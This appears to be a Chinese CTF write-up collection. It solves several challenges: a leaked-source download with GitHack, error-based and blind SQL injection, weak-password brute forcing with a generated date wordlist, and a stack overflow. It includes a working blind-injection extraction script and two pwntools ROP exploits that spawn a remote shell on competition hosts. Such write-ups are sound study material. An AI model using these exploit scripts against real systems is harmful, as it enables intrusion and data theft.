通过文件扫描找到有文件泄露 利用Githack工具就可以把文件下下来 flag{027ea8c2-7be2-4cec-aca3-b6ba400759e8}
这题是道综合性网站,可以查到现有的漏洞,一点都没有变 原题 根据报错注入,显示的md5找到对应的值就是密码
访问其中的flag4ae482cda6e.txt即可得到flag
题目提示了有弱口令 首先生成字典
f = open('1.txt','w') for i in range(1,13): for j in range(1,32): f.write('2017'+'0'*(2-len(str(i)))+str(i)+'0'*(2-len(str(j)))+str(j)+'\n')利用burpsuit爆破
扫一下有index.php~源代码 1、用with rollup过前面两个if 2、用盲注找到flag 关于第一点在实验吧有原题:http://www.shiyanbar.com/ctf/1940 过滤方法稍有不同,用操作符代替关键字即可。token使用变量覆盖就可以。 第二点就是infoid这个参数有盲注,跑脚本可以拿到flag。 最后贴上注入脚本
import requests string = '' dic = "flag{}abcdef1234567890" for i in range(1,40): for j in dic: url="http://106.75.117.4:3083/?token=21232f297a57a5a743894a0e4a801fc3&infoid=1 && ascii(substr((select group_concat(flag) from flag)from({})for(1)))={}&userid=1 || 1 group by password with rollup limit 1 offset 1&password=".format(i,ord(j)) s=requests.get(url=url) content=s.content if "flag is in flag!" in content: string+=j break print string简单的栈溢出,通过构造rop执行system,直接写出脚本
from pwn import * pwn1 = ELF('redhat/pwn1') sh = remote('106.75.93.221', 10000) padding = 'A'*(52)#长度爆出来的 system_addr = p32(pwn1.plt['system']) scanf_addr = p32(0x08048410) bss_addr = p32(0x0804A040) args = p32(0x08048629)+ bss_addr rop = p32(0x080485ee) sh.recvline() payload = padding+scanf_addr+rop+args+system_addr+'a'*4+bss_addr sh.sendline(payload) sh.sendline('/bin/sh\x00') sh.interactive()还有一种较为简单的方法,直接利用pwntools自带的工具
from pwn import * #context.log_level = 'debug' binary = ELF('./redhat/pwn1') p = remote('106.75.93.221', 10000) p.recvline() rop = ROP(binary) rop.call(0x08048410,(0x08048629, 0x0804A040)) rop.system(0x0804A040) payload = str(rop) p.sendline('a'*52 + payload ) p.sendline('/bin/sh') p.interactive()